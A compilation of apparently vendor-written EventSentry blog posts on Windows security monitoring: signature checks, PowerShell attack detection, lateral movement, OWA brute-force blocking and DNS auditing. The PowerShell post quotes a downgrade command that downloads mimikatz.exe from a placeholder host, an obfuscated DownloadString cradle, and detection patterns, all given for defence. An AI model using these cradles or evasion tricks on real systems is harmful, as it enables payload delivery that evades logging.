EventSentry SysAdmin Tools: Digital Signature Verification with checksum.exe

Windows supports a code-signing feature called Authenticode, which allows a software publisher to digitally sign executable files (e.g. .exe, .msi, …) so that users can verify their authenticity. The digital signature of a file can be viewed in the file properties in Windows Explorer on the "Digital Signatures" tab.

Viewing the digital signature of the Opera browser

Digital signature verification has been added to the checksum utility, which already calculates the checksum and entropy of a file. When using the new /s switch, checksum.exe will tell you:

  • whether the file is digitally signed
  • whether a counter signature exists
  • whether the digital signature is valid
  • the algorithm used (e.g. SHA-256)
  • who signed the file
  • who issued the certificate
  • when the file was signed

The utility also sets the ERRORLEVEL variable accordingly; if a signature check is requested with the /s switch but the file is unsigned, then checksum.exe will set %ERRORLEVEL% to 2. Below is a sample output of the utility in action:

Viewing the digital signature of the Windows ping utility
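
Because the exit code is set, the check is easy to script. Here is a minimal batch sketch (it assumes checksum.exe is in the PATH; only the /s switch and the exit code of 2 for unsigned files are taken from the description above):

@echo off
checksum.exe /s "C:\Windows\System32\ping.exe"
if %ERRORLEVEL% EQU 2 echo File is NOT digitally signed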

Digital signature verification will be added to EventSentry’s FIM monitoring component (“File Checksum Monitoring”) in the upcoming v3.4.3 release, which will give you the option to only get notified when unsigned files are changed, thus reducing overall noise.

You can download the latest version from here – enjoy!

From PowerShell to p@W3RH311 – Detecting and Preventing PowerShell Attacks

In part one I provided a high-level overview of PowerShell and the potential risk it poses to networks. Of course we can only mitigate some PowerShell attacks if we have a trace, so going forward I am assuming that you followed part 1 of this series and enabled:

  • Module Logging
  • Script Block Logging
  • Security Process Tracking (4688/4689)

I am dividing this blog post into 3 distinct sections:

  1. Prevention
  2. Detection
  3. Mitigation

We start by attempting to prevent PowerShell attacks in the first place, decreasing the attack surface. Next we want to detect malicious PowerShell activity by monitoring a variety of events produced by PowerShell and Windows (with EventSentry). Finally, we will mitigate and stop attacks in their tracks. EventSentry’s architecture involving agents that monitor logs in real time makes the last part possible.

But before we dive in … the

PowerShell Downgrade Attack

In the previous blog post I explained that PowerShell v2 should be avoided as much as possible since it offers zero logging, and that PowerShell v5.x or higher should ideally be deployed since it provides much better logging. As such, you would probably assume that basic script activity would end up in one of the PowerShell event logs if you enabled Module & ScriptBlock logging and have at least PS v4 installed. Well, about that.

So let’s say a particular Windows host looks like this:

  • PowerShell v5.1 installed
  • Module Logging enabled
  • ScriptBlock Logging enabled

Perfect? Possibly, but not necessarily. There is one version of PowerShell that, unfortunately for us, doesn’t log anything useful whatsoever: PowerShell v2. Also unfortunately for us, PowerShell v2 is installed on pretty much every Windows host out there, although only activated (usable) on those hosts where it either shipped with Windows or where the required .NET Framework is installed. Unfortunately for us #3, forcing PowerShell to use version 2 is as easy as adding -version 2 to the command line. So for example, the following line will download some payload and save it as calc.exe without leaving a trace in any of the PowerShell event logs:

powershell -version 2 -nop -NoLogo -Command "(new-object System.Net.WebClient).DownloadFile('http://www.pawnedserver.net/mimikatz.exe', 'calc.exe')"

However, let’s not forget that PowerShell automatically expands command line parameters if there is no conflict with other parameters, so running

powershell -v 2 -nop -NoLogo -Command "(new-object System.Net.WebClient).DownloadFile('http://www.pawnedserver.net/mimikatz.exe', 'calc.exe')"

does the exact same thing. So when doing pattern matching we need to use something like -v* 2 to ensure we can catch this parameter.

Microsoft seems to have recognized that PowerShell is being exploited for malicious purposes, resulting in some of the advanced logging options like ScriptBlockLogging being supported in newer versions of PowerShell / Windows. At the same time, Microsoft also pats itself on the back by stating that PowerShell is – by far – the most securable and security-transparent shell, scripting language, or programming language available. This isn't necessarily untrue – any scripting language (Perl, Python, …) can be exploited by an attacker just the same and would leave no trace whatsoever. And most interpreters don't have the type of logging available that PowerShell does. The difference with PowerShell is simply that it's installed by default on every modern version of Windows. This is any attacker's dream – they have a complete toolkit at their fingertips.

So which Operating Systems are at risk?

PowerShell Version 2 Risk

| Windows Version | PowerShell V2 Active By Default | PowerShell V2 Removable? | Threat Level |
| --- | --- | --- | --- |
| Windows 7 | Yes | No | Vulnerable |
| Windows 2008 R2 | Yes | No | Vulnerable |
| Windows 8 & later | No | Yes | Potentially Vulnerable – depends on .NET Framework v2.0 |
| Windows 2012 & later | No | Yes | Potentially Vulnerable – depends on .NET Framework v2.0 |

Versions of Windows susceptible to Downgrade Attack

OK, so that’s the bad news. The good news is that unless PowerShell v2 was installed by default, it isn’t “activated” unless the .NET Framework 2.0 is installed. And on many systems that is not the case. The bad news is that .NET 2.0 probably will likely be installed on some systems, making this downgrade attack feasible. But another good news is that we can detect & terminate PowerShell v2 instances with EventSentry (especially when 4688 events are enabled) – because PowerShell v2 can’t always be uninstalled (see table above). And since we’re on a roll here – more bad news is that you can install the required .NET Framework with a single command:

dism.exe /online /enable-feature /featurename:NetFX3 /all

Of course one would need administrative privileges to run this command, something that makes this somewhat more difficult. But attacks that bypass UAC exist, so it’s feasible that an attacker accomplishes this if the victim is a local administrator.

According to a detailed (and very informative) report by Symantec, PS v2 downgrade attacks haven’t been observed in the wild (of course that doesn’t necessarily mean that they don’t exist), which I attribute to the fact that most organizations aren’t auditing PowerShell sufficiently, making this extra step for an attacker unnecessary. I do believe that we will start seeing this more, especially with targeted attacks, as organizations become more aware and take steps to secure and audit PowerShell.

1. Prevention

Well, I think you get the hint: PowerShell v2 is bad news, and you’ll want to do one or all of the following:

  • Uninstall PowerShell v2 whenever possible
  • Prevent PowerShell v2 from running (e.g. via AppLocker)
  • Detect and terminate any instances of PowerShell v2

If you so wish, you can read more about the PowerShell downgrade attack, along with detailed information on how to configure AppLocker, here.

Uninstall PowerShell v2

Even if the .NET Framework 2.0 isn't installed, there is usually no reason to have PowerShell v2 installed. I say usually because some Microsoft products like Exchange Server 2010 do require it and force all scripts to run against version 2. PowerShell version 2 can be uninstalled manually (Windows 8 & higher, Windows Server 2012 & higher) from the Control Panel's Programs & Features or with a single PowerShell command (why of course – we're using PowerShell to remove PowerShell!):

Disable-WindowsOptionalFeature -Online -FeatureName 'MicrosoftWindowsPowerShellV2' -norestart

While running this script is slightly better than clicking around in Windows, it doesn't help much when you want to remove PowerShell v2.0 from dozens or even hundreds of hosts. Since you can run PowerShell remotely as well (something in my gut already tells me this won't always be used for honorable purposes) we can use the Invoke-Command cmdlet to run this statement on a remote host:

Invoke-Command -Computer WKS1 -ScriptBlock { Disable-WindowsOptionalFeature -Online -FeatureName 'MicrosoftWindowsPowerShellV2' -norestart }

Just replace WKS1 with the host name from which you want to remove PowerShell v2 and you’re good to go. You can even specify multiple host names separated by a comma if you want to run this command simultaneously against multiple hosts, for example

Invoke-Command -Computer WKS1,WKS2,WKS3 -ScriptBlock { Disable-WindowsOptionalFeature -Online -FeatureName 'MicrosoftWindowsPowerShellV2' -norestart }
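
To verify the removal afterwards, or to find hosts where the v2 engine is still enabled in the first place, a quick check along these lines should work (the host names are placeholders; Get-WindowsOptionalFeature requires Windows 8 / Server 2012 or later):

Invoke-Command -ComputerName WKS1,WKS2,WKS3 -ScriptBlock { Get-WindowsOptionalFeature -Online -FeatureName 'MicrosoftWindowsPowerShellV2' } | Select-Object PSComputerName, FeatureName, State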

Well congratulations, at this point you’ve hopefully accomplished the following:

  • Enabled ModuleLogging and ScriptBlockLogging enterprise-wide
  • Identified all hosts running PowerShell v2 (you can use EventSentry’s inventory feature to see which PowerShell versions are running on which hosts in a few seconds)
  • Uninstalled PowerShell v2 from all hosts where supported and where it doesn’t break critical software

Terminate PowerShell v2

Surgical Termination using 4688 events

If you cannot uninstall PowerShell v2.0, don't have access to AppLocker, or simply want an easier way than AppLocker, then you can also use EventSentry to terminate any powershell.exe process if we detect that PowerShell v2.0 was invoked with the -version 2 command line argument. We do this by creating a filter that looks for 4688 powershell.exe events that include the -version 2 argument and linking that filter to an action that terminates that PID.

Filter & Action to terminate PS v2.0

If an attacker tries to launch his malicious PowerShell payload using the PS v2.0 engine, then EventSentry will almost immediately terminate that powershell.exe process. There will be a small lag between the time the 4688 event is logged and when EventSentry sees & analyzes the event, so it's theoretically possible that part of a script will begin executing. In all of the tests I have performed however, even a simple "Write-Host Test" PowerShell command wasn't able to execute properly because the powershell.exe process was terminated before it could run. This is likely because the PowerShell engine does need a few milliseconds to initialize (after the 4688 event is logged), enough time for EventSentry to terminate the process. As such, any malicious script that downloads content from the Internet will almost certainly be terminated before it can do any harm.

Shotgun Approach

The above approach won’t prevent all instances of PowerShell v2.0 from running however, for example when the PowerShell v2.0 prompt is invoked through a shortcut. In order to prevent those instances of PowerShell from running we’ll need to watch out for Windows PowerShell event id 400, which is logged anytime PowerShell is launched. This event tells us which version of PowerShell was just launch via the EngineVersion field, e.g. it will include EngineVersion=2.0 when PowerShell v2.0 is launched. We can look for this text and link it to a Service action (which can also be used to terminate processes).

Filter & Action to terminate all powershell instances
Terminate all powershell instances

Note: Since there is no way to correlate a Windows PowerShell event 400 with an active process (the 400 event doesn't include a PID), we cannot just selectively kill version 2 powershell.exe processes. As such, when a PowerShell v2 instance is detected, all powershell.exe processes are terminated, including version 5 instances. I personally don't expect this to be a problem, since PowerShell processes usually only run for short periods of time, making it unlikely that a PowerShell v5 process is active while a PowerShell v2.0 process is (maliciously) being launched. But decide for yourself whether this is a practicable approach in your environment.

2. Detection

Command Line Parameters

Moving on to detection, our objective is to detect potentially malicious uses of PowerShell. Due to the wide variety of abuse possibilities with PowerShell it's somewhat difficult to detect every suspicious invocation, but there are a number of command line parameters that should almost always raise a red flag. In fact, I would recommend alerting on or even terminating all PowerShell instances which include the following command line parameters:

Highly Suspicious PowerShell Parameters

| Parameter | Variations | Purpose |
| --- | --- | --- |
| -noprofile | -nop | Skip loading profile.ps1 and thus avoid logging |
| -encoded | -e | Let a user run encoded PowerShell code |
| -ExecutionPolicy bypass | -ep bypass, -exp bypass, -exec bypass | Bypass any execution policy in place; may generate false positives |
| -windowStyle hidden | | Prevents the creation of a window; may generate false positives |
| -version 2 | -v 2, -version 2.0 | Forces PowerShell version 2 |

Any invocation of PowerShell that includes the above parameters is highly suspicious

The advantage of analyzing command line parameters is that it doesn’t have to rely on PowerShell logging since we can evaluate the command line parameter of 4688 security events. EventSentry v3.4.1.34 and later can retrieve the command line of a process even when it’s not included in the 4688 event (if the process is active long enough). There is a risk of false positives with these parameters, especially the “windowStyle” option that is used by some Microsoft management scripts.
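
Note that Windows only embeds the process command line in 4688 events when the "Include command line in process creation events" policy is enabled (Windows 8.1 / Server 2012 R2 and later). This is normally configured via Group Policy; as a rough sketch, the equivalent registry change looks like this:

New-Item -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit' -Force | Out-Null
Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit' -Name 'ProcessCreationIncludeCmdLine_Enabled' -Value 1 -Type DWord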

Modules

In addition to evaluating command line parameters we’ll also want to look out for modules that are predominantly used in attacks, such as .Download, .DownloadFile, Net.WebClient or DownloadString. This is a much longer list and will need to be updated on a regular basis as new toolkits and PowerShell functions are being made available.

Depending on the attack variant, module names can be monitored via security event 4688 or through PowerShell's enhanced module logging (hence the importance of suppressing PowerShell v2.0!), like event 4103. Again, you will most likely get some false positives and have to set up a handful of exclusions.

Command / Code Obfuscation

But looking at the command line and module names still isn't enough, since it's possible to obfuscate PowerShell commands using the backtick character. For example, the command

(New-Object Net.WebClient).DownloadString('https://bit.ly/L3g1t')

could easily be detected by looking for the *Net.WebClient*, *DownloadString* or *https* patterns. Curiously enough, this command can also be written in the following way:

Invoke-Expression (New-Object Net.Web`C`l`i`ent)."`D`o`wnloadString"('h'+'t'+'t'+'ps://bit.ly/L3g1t')

This means that just looking for DownloadString or Net.WebClient is not sufficient; Daniel Bohannon devoted an entire presentation to PowerShell obfuscation that's available here. Thankfully we can still detect tricks like this with regex patterns that look for a high number of single quotes and/or backtick characters. An example regex for EventSentry that detects 2 or more backticks looks like this:

^.*CommandLine=.*([^`]*`){2,}[^`]*.*$

The above expression can be used on PowerShell event id 800 events, and will trigger every time a command which involves 2 or more backticks is executed. To customize the trigger count, simply change the number 2 to something lower or higher. And of course you can look for characters other than the backtick by substituting them in the regex. Note that the character we look for appears three (3) times in the regex, so it will have to be substituted 3 times.
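
A quick way to sanity-check the pattern (a sketch; the sample command lines below are made up) is to run it against a few strings in PowerShell:

$pattern = '^.*CommandLine=.*([^`]*`){2,}[^`]*.*$'
'CommandLine=powershell.exe Write-Host Hello' -match $pattern              # returns False (no backticks)
'CommandLine=powershell.exe (New-Object Net.Web`C`l`ient)' -match $pattern # returns True (3 backticks)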

To make things easier for EventSentry users, EventSentry now offers a PowerShell event log package which you can download via the Packages -> Download feature. The package contains filters which will detect suspicious command line parameters (e.g. “-nop”), detect an excessive use of characters used for obfuscation (and likely not used in regular scripts) and also find the most common function names from public attack toolkits.

Evasion

It’s still possible to avoid detection rules that focus on powershell.exe if the attacker manages to execute PowerShell code through a binary other than powershell.exe, because powershell.exe is essentially just the “default vehicle” that facilitates the execution of PowerShell code. The NPS (NotPowerShell) project is a good example and executes PS code through a binary named nps.exe (or whatever the attacker wants to call lit), but there are others. While the thought of running PowerShell code through any binary seems a bit concerning from a defenders perspective, it’s important to point out that downloading another binary negates the advantage of PowerShell being installed by default. I would only expect to see this technique in sophisticated, targeted attacks that possibly start the attack utilizing the built-in PowerShell, but then download a stealth app for all subsequent activity.

This attack can still be detected if we can determine that one of the following key DLLs from the Windows management framework are being loaded by a process other than powershell.exe:

  1. System.Management.Automation.Dll
  2. System.Management.Automation.ni.Dll
  3. System.Reflection.Dll

You can detect this with Sysmon, something I will cover in a follow-up article.
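
Until then, a rough sketch of such a check could look like this, assuming Sysmon is already installed with image-load logging (Event ID 7) enabled:

Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 7 } |
    Where-Object { $_.Message -match 'System\.Management\.Automation' -and $_.Message -notmatch 'powershell(_ise)?\.exe' } |
    Select-Object TimeCreated, Message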

3. Mitigation

EventSentry PowerShell Rules

Now, having traces of all PowerShell activity when doing forensic investigations is all well and good, and detecting malicious PowerShell activity after it happened is a step in the right direction. But if we can ascertain which commands are malicious, then why not stop & prevent the attack before it spreads and causes damage?

In addition to the obvious action of sending all logs to a central location, there are a few things we can do in response to potentially harmful activity:

1. Send out an alert
2. Mark the event to require acknowledgment
3. Attempt to kill the process outright (the nuclear option)
4. A combination of the above

If the only source of the alert is one of the PowerShell event logs then killing the exact offending PowerShell process is not possible, and all running powershell.exe processes have to be terminated. If we can identify the malicious command from a 4688 event however, then we can perform a surgical strike and terminate only the offending powershell.exe process – other (presumably benign) powershell.exe processes will remain unharmed and can continue to do whatever they were supposed to do.

If you’re unsure as to how many PowerShell scripts are running on your network (and not knowing this is not embarrassing – many Microsoft products run PowerShell scripts on a regular basis in the background) then I recommend just sending email alerts initially (say for a week) and observe the generated alerts. If you don’t get any alerts or no legitimate PowerShell processes are identified then it should be safe to link the filters to a “Terminate PowerShell” action as shown in the screenshots above.

Testing

After downloading and deploying the PowerShell package I recommend executing a couple of offending PowerShell commands to ensure that EventSentry will detect them and either send out an alert or terminate the process (or both – depending on your level of conviction). The following commands should be alerted on and/or blocked:

powershell.exe -nop Write-Host AlertMe

powershell.exe (New-Object Net.WebClient).DownloadString('https://bit.ly/L3g1t')

powershell.exe `Wr`it`e-`H`ost AlertMeAgain

False Alerts & Noise

Any detection rules you set up, whether with EventSentry or another product, will almost certainly result in false alerts – the amount of which will depend on your environment. Don't let this dissuade you – simply identify the hosts which are "incompatible" with the detection rules and exclude either specific commands or exclude hosts from these specific rules. It's better to monitor 98 out of 100 hosts than not to monitor any host at all.

With EventSentry you have some flexibility when it comes to excluding rules from one or more hosts.

Conclusion

PowerShell is a popular attack vector on Windows-based systems since it’s installed by default on all recent versions of Windows. Windows admins need to be aware of this threat and take the appropriate steps to detect and mitigate potential attacks:

  1. Disable or remove legacy versions of PowerShell (=PowerShell v2)
  2. Enable auditing for both PowerShell and Process Creation
  3. Collect logs as well as detect (and ideally prevent) suspicious activity

EventSentry users have an excellent vantage point since its agent-based architecture can not only detect malicious activity in real time, but also prevent it. The PowerShell Security event log package, which can be downloaded from the management console, offers a list of rules that can detect many PowerShell-based attacks.

Mr. Robot, Mimikatz and Lateral Movement

In Mr. Robot‘s episode 9 of season 2 (13:53), Angela Moss needs to obtain the Windows domain password of her superior, Joseph Green, in order to download sensitive documents that would potentially incriminate EvilCorp. Since her attack requires physical access to his computer, she starts with a good old-fashioned social engineering attack to get the only currently present employee in the office to leave.

Angela “obtaining” logon credentials

Once in his office, she uses a USB Rubber Ducky, a fast and automated keyboard emulator, to obtain Joseph’s clear text password using mimikatz. Please note that there are some holes in this scene which I will get into later. For now we’ll assume that she was able to obtain his credentials by having physical access to his computer.

USB Rubber Ducky

After she gets back to her workstation, she analyzes the capture, which reveals Joseph's password: holidayarmadillo. Not the best password, but for this particular attack the quality of the password wouldn't have mattered anyway. Mimikatz was (is) able to get the password from memory without utilizing brute force or dictionary techniques. Once she has the password, she logs off and logs back on with Joseph's user account and downloads the documents she needs.

Mimikatz Output

As somebody who helps our users improve the security of their networks, I of course immediately contemplated how this attack could have been detected with EventSentry. Since most users only log on to one workstation on any given day with their user account, Angela logging in with Joseph’s account (resulting in “joseph.green” logging on to two different workstations) would actually be an easy thing to detect.

Lateral Network Movement

Introduced with v3.4, collector-side thresholds allow the real-time detection of pretty much any user activity that originates from an event, for example user logons or process launches. You can tell EventSentry that (physical) logons for any user on more than one host (within a given time period – say 9 hours) should trigger an alert (aka "lateral movement"). Had this been in place at EvilCorp, Angela logging in as Joseph would have immediately triggered an alert. With the right procedures in place, countermeasures could have been taken. Of course most viewers wouldn't want Angela to be caught, so please consider my analysis strictly technical. Watch a short video on lateral movement detection with EventSentry here.

So what’s the hole? Well, the rubber ducky (mimikatz, really) requires access to an active logon session, which Angela most likely didn’t have. It looked like Joseph had been out of the office for a while, so his computer was likely either locked or turned off, rendering any attack based on mimikatz useless. Mimikatz – since it obtains passwords from memory – only works if the computer is unlocked. And had the computer been unlocked then she could have just downloaded the files from his computer – although this would have been even more risky with people walking around the office.

Cyber attacks are becoming more potent every year and are often sponsored by powerful criminal gangs and/or governments. It’s important that companies employ multiple layers of defense to protect themselves (and their customers) from these increasingly sophisticated and destructive attacks.

EventSentry is the only monitoring solution that utilizes robust agent-based technology that goes beyond logs, enabling the fusion of real-time log monitoring with in-depth system monitoring to not only detect but also react to attacks and anomalies. See for yourself and download a free evaluation of EventSentry.

Securing Exchange Server OWA & ActiveSync – Proactive Security with EventSentry

Almost every company which runs Microsoft Exchange Server needs to make port 443 available to the Internet in order to provide their users access to email via their mobile devices or OWA.

Since both OWA & ActiveSync utilize Active Directory for authentication, exposing OWA/ActiveSync to the Internet indirectly exposes Active Directory as well. While user lockout policies provide some protection against brute force attacks, additional protection methods should be employed. Furthermore, password spraying attacks may be used to circumvent lockout policies – something that would be more likely to succeed in larger organizations.

With the proper auditing enabled (Logon/Logoff – Logon (Failure)) and EventSentry installed however, we can permanently block remote users / hosts who attempt to log on too many times with a wrong password. Setting this up is surprisingly simple:

  1. Windows: Enable (or verify) Auditing
  2. EventSentry: Setup action which creates firewall block rule
  3. EventSentry: Setup filter looking for 4625 Audit Failure events

Bonus: This procedure works with the free version of EventSentry (EventSentry Light) and can be applied to any IIS-based web site which uses authentication.

Windows Auditing

In the group policy settings that affect the server running OWA, make sure that auditing for Failure events in the Audit Logon sub-category of the Logon/Logoff category is enabled (of course you can audit Success events as well). If you are running the full version of EventSentry v3.4 or later then you can verify all effective audit settings, for example on the Audit Policy Status page.

Enabling correct auditing for logon failures
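
If you prefer the command line, the effective setting can also be verified directly on the OWA server with the built-in auditpol utility (run from an elevated prompt):

auditpol /get /subcategory:"Logon"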

Creating an Action

Since event 4625 contains the IP address of the remote host, the easiest way to subsequently block it is to run the netsh command. In the management console, create a new action by clicking on the “Action” header in the ribbon and selecting the process action as its type. See the screenshot below:

Triggering netsh to block an IP address

The following command line will work in EventSentry v3.4 and later:

advfirewall firewall add rule name="$STRIpAddress $YEAR-$MONTH-$DAY -- automatic block by EventSentry" dir=in interface=any action=block remoteip=$STRIpAddress/32

If you are running EventSentry v3.3 or earlier then you will need to use the $STR20 variable instead:

advfirewall firewall add rule name="$STR20 $YEAR-$MONTH-$DAY -- automatic block by EventSentry" dir=in interface=any action=block remoteip=$STR20/32

The difference here is that v3.4 and later can refer to insertion string variables by name, making the action more universal and potentially applicable to any event that uses the same field name.

When this action is triggered, it will extract the IP address from the event and block it from the system entirely.
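
Once the insertion string is resolved, the resulting command is equivalent to running something like the following (with a sample IP address and date):

netsh.exe advfirewall firewall add rule name="203.0.113.45 2017-06-08 -- automatic block by EventSentry" dir=in interface=any action=block remoteip=203.0.113.45/32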

Creating a Filter

Create an event log filter which matches Audit Failure events from the Security event log with event id 4625, where insertion string 19 matches the w3wp.exe process (C:\Windows\System32\inetsrv\w3wp.exe). This ensures that only users accessing the host via the web will be subject to blocking. The screenshot below shows the configuration:

Adding a firewall rule from a 4625 audit failure event

This filter can either be added to an existing package or added to a new package that is assigned only to the Exchange server. If the filter is added to an existing package that applies to servers other than the Exchange server, then the computer field of the filter can be used to ensure the filter is evaluated only on the desired host. Select the action created in the previous step.

Since users may occasionally enter an incorrect password I recommend setting up a threshold so that remote IPs are only blocked after 3 or more failed logon attempts. Thresholds are configured by clicking on the "Threshold" tab (see the blue "i" above) and an example configuration is shown below. Feel free to adjust the threshold to match your users' ability to enter their password correctly :-). Insertion string 20 – which represents the IP address of this event – was selected in the threshold matching section to ensure that each IP address has its own, unique threshold. Note: The event logging settings shown are optional.

Trigger process after 3 failed logon attempts.

Save/deploy or push the configuration to the mail server.

 

Considerations

Triggering a system process from external input is something we should always do with caution. For example, if Windows has an upper limit to the maximum number of rules that can be added, then an attacker could launch a DoS attack IF they had the ability to launch attacks from different IP addresses. Launching a DoS attack from the same IP won’t be possible once they are blocked. You can mitigate this risk by applying a threshold to the EventSentry action calling netsh.exe, for example by limiting it to 100 / hour. This would still provide sufficient protection while also ensuring that only 100 rules could be added per hour (thresholds can be set by clicking on the “Options” button on an action). A regular audit of the netsh execution (e.g. via Process Tracking) would quickly show any sort of abuse.

Over time the number of firewall rules added to the mail server could become rather large, which is why the rules are created with a date appended. This makes managing these rules easier, and the name can also be adapted in the action by changing the “rule name” parameter. The screenshot below shows the inbound firewall rules after two IPs have been blocked:

List of inbound firewall rules
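
If you ever need to review or clean up the accumulated rules by hand, the consistent rule name makes that easy, for example with the NetSecurity PowerShell cmdlets available on Windows Server 2012 and later (a sketch; adjust the name pattern if you customized it):

Get-NetFirewallRule -DisplayName '*automatic block by EventSentry*' | Select-Object DisplayName, Enabled
Get-NetFirewallRule -DisplayName '*automatic block by EventSentry*' | Remove-NetFirewallRule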

If manual cleanup of firewall rules is not desirable or an option, then the netsh command can also be wrapped into a script which would erase the firewall rule again after a timeout (e.g. 15 minutes). The script could look like this:

"C:\windows\system32\netsh.exe" advfirewall firewall add rule name="%1 %2 -- automatic block by EventSentry" dir=in interface=any action=block remoteip=%1/32
timeout /t 900
"C:\Windows\system32\netsh.exe" advfirewall firewall delete rule name="%1 %2 -- automatic block by EventSentry"

In this case you would call the wrapper script instead of the netsh.exe process directly (General Options – Filename) and use the string below as the arguments:

$STRIpAddress $YEAR-$MONTH-$DAY

To keep things simple you can just make the script an embedded script (Tools menu) and reference the script. The timeout value (900 in the above example) is the duration in seconds the remote IP will be blocked. If you want to block the IP for an hour then you would set the timeout value to 3600 instead. When going this route I strongly suggest clearing both event log check boxes in the Options dialog of the action.

Happy Blocking!

Auditing DNS Server Changes on Windows 2012 R2 and later with EventSentry

Auditing changes on a Microsoft Windows DNS server is a common requirement and question, but it's not immediately obvious which versions of Windows support DNS auditing, how it's enabled, and what audit data is available (and where). Fortunately Microsoft has greatly simplified DNS Server auditing with the release of Windows Server 2012 R2.

In this post we’ll show how to enable DNS Auditing on 2012 R2 and later, and how to configure EventSentry to collect those audit events. In a future post we’ll also show how to do the same with older versions of Windows – 2008, 2008 R2 & 2012.

Once the configuration is finished you will be able to see when a zone/record is created/modified/deleted as well as by whom. The audit data will be available (and searchable) in the EventSentry Web Reports, and you'll also be able to set up email alerts when some or all DNS entries are changed.

Prerequisites

Since native DNS auditing was only introduced with Windows Server 2012 R2, you'll need to run at least Windows Server 2012 R2 in order to follow this guide. The table below shows the types of DNS auditing available on Windows Server Operating Systems:

| Windows OS | Auditing Type | Comments |
| --- | --- | --- |
| Windows 2008 | Active Directory-based auditing only | covered in future post |
| Windows 2008 R2 | Active Directory-based auditing only | covered in future post |
| Windows 2012 | Active Directory-based auditing only | covered in future post |
| Windows 2012 R2 | Native DNS Auditing | Available with hotfix 2956577 (automatically applied via Windows Update!) |
| Windows 2016 | Native DNS Auditing | Enabled by default |

Configuration

Enhanced DNS logging and diagnostics are enabled by default in supported versions of Windows Server when the “DNS Server” role has been added to Windows, so there are no additional configuration steps that need to be done.
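
To double-check that the audit channel exists and is enabled on a particular DNS server, a quick PowerShell query like this should do (a sketch):

Get-WinEvent -ListLog 'Microsoft-Windows-DNSServer/Audit' | Select-Object LogName, IsEnabled, RecordCount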

1. Package Creation

On the EventSentry machine we are going to add a package under Packages/Event Logs by right-clicking “Event Logs” and selecting “Add Package”. In this example we are going to call the package “Windows Server 2016”:

Package Creation

2. Adding a Filter

The next step is to add a filter to the previously created package “Windows Server 2016”. Right click the package and then select “Add Filter”.

Adding the DNS Audit filter

Note: For a short tutorial on how to create a filter click here.

3. Filter Configuration

There are several ways to approach the filter configuration depending on your needs. As a reminder, a filter is a rule in EventSentry that determines where an event is forwarded, or how it is processed.

  1. Collect all or select (e.g. creation only) DNS audit data in the database
  2. Email alert on select audit data (e.g. email all deletions)
  3. Email alert on all activity from a specific user

In this guide we will show how to accomplish (1) and (2) as a bonus.

After the filter has been created, the right pane of the management console shows the General tab of the new filter. We decided to configure it to log to the Primary Database, but the events can be sent to any action (Email, Syslog, …).

Under "Event Severity" we check all boxes since we want to log everything (it's important to check "Information" since most of the creations/deletions/etc. are logged at this severity level).

Editing the DNS Audit filter

4. Adding a custom event log

In the "Log" section click on "more" to jump to the "Custom Event Logs" tab (or just click on that tab). Now we need to add the Microsoft-Windows-DNSServer/Audit event log to the list of custom event logs so that this filter picks up events from the DNS Audit event log. Click the save button in the EventSentry Management Console title bar to save the changes we've made so far.

Adding an Application & Services event log

5a. Assigning the package (method A – manual assignment)

To assign the package, select the server you would like to assign it to and select “Assign Packages”. In the resulting dialog simply check the box next to the package we created in step 1. Alternatively you can also select the package and click “Assign” from the ribbon (or context menu) and select a group or host(s) to assign the package to.

Assigning a package

5b. Assign the package (method B – dynamic activation)

Instead of assigning the package manually, the package can be assigned dynamically so that any host monitored by EventSentry running Windows Server 2012 R2 or later will automatically have this package assigned. To dynamically assign a package do the following:

  • Click the package and select “Properties” from the ribbon, or right-click.
  • In the “Dynamic Activation” section, check “Automatically activate …”
  • In the “Installed Services” field enter “DNS”
  • For the “Operating System”, select “at least” and “Windows 2012 R2”
  • Click the “Global” icon in the ribbon to make sure the package gets assigned to all hosts. Don’t worry, it will still only be activated on 2012 R2 or later hosts that have the DNS server running

6. Saving

After assigning the package and saving the configuration click “Save & Deploy” or push the configuration to all remote hosts. Please note that only new events generated in the DNS Audit Log will be processed, pre-existing log entries will be ignored.

Testing the Configuration

To test the configuration we will create a domain called “testzone.com” and add an A record called www on the monitored DNS server. We’ll then check if those modifications are visible in the EventSentry Web Reports. The screenshot below shows the new A record in the DNS console:

testzone.com with the new A record “www”
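
If you prefer to make the test changes from PowerShell instead of the DNS console, something along these lines should work on the DNS server (the zone name, record name and IP address are just examples; the DnsServer module is installed along with the DNS role):

Add-DnsServerPrimaryZone -Name 'testzone.com' -ZoneFile 'testzone.com.dns'
Add-DnsServerResourceRecordA -ZoneName 'testzone.com' -Name 'www' -IPv4Address '192.0.2.10'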

First, let's take a look to see what the actual DNS Audit entries look like (using the Windows Event Viewer: Applications and Services Logs/Microsoft/Windows/DNS-Server/Audit):

DNS Server Audit Event Log
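
The same entries can also be pulled from the command line if needed, for example with (a sketch):

Get-WinEvent -LogName 'Microsoft-Windows-DNSServer/Audit' -MaxEvents 20 | Select-Object TimeCreated, Id, Message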

In the EventSentry Web Reports, navigate to Logs/Event Log and filter by the log “Microsoft-Windows-DNSServer” and then select “Detailed”. You should see all the modifications that were performed:

Detailed audit log in the web reports

Bonus Track: Configuring alerts for a specific change

The first part of this post was purposely generic in order to understand the basics of monitoring your DNS Server. But as a bonus we’ll show how to monitor a specific change (in this case a creation) and trigger an email alert for that.

The process is the same as explained in the beginning:

  1. Create a new filter and add it to the same package. The filter should be configured exactly the same way. To make things easier, you can also copy & paste the filter with the familiar Copy/Paste buttons in the ribbon or context menu.
  2. This time however we specify the “Default Email” action in “General” tab so that we receive an email alert when the filter criteria matches an event.
  3. In the "Details" area specify event id 515 in the "Event ID" field, which is the event id corresponding to the creation of a new record. This is what the filter would look like:
Filter for receiving an alert on record creation

Filters can of course be more specific as well; it's possible to filter based on the user or the content of the actual event. Below is a list of all audit events logged by the DNS Server:

| Event ID | Type | Event ID | Type |
| --- | --- | --- | --- |
| 512 | Zone added | 551 | Clear statistics |
| 513 | Zone delete | 552 | Start scavenging |
| 514 | Zone updated | 553 | Enlist directory partition |
| 515 | Record create | 554 | Abort scavenging |
| 516 | Record delete | 555 | Prepare for demotion |
| 517 | RRSET delete | 556 | Write root hints |
| 518 | Node delete | 557 | Listen address |
| 519 | Record create – dynamic update | 558 | Active refresh trust points |
| 520 | Record delete – dynamic update | 559 | Pause zone |
| 521 | Record scavenge | 560 | Resume zone |
| 522 | Zone scope create | 561 | Reload zone |
| 523 | Zone scope delete | 562 | Refresh zone |
| 525 | Zone sign | 563 | Expire zone |
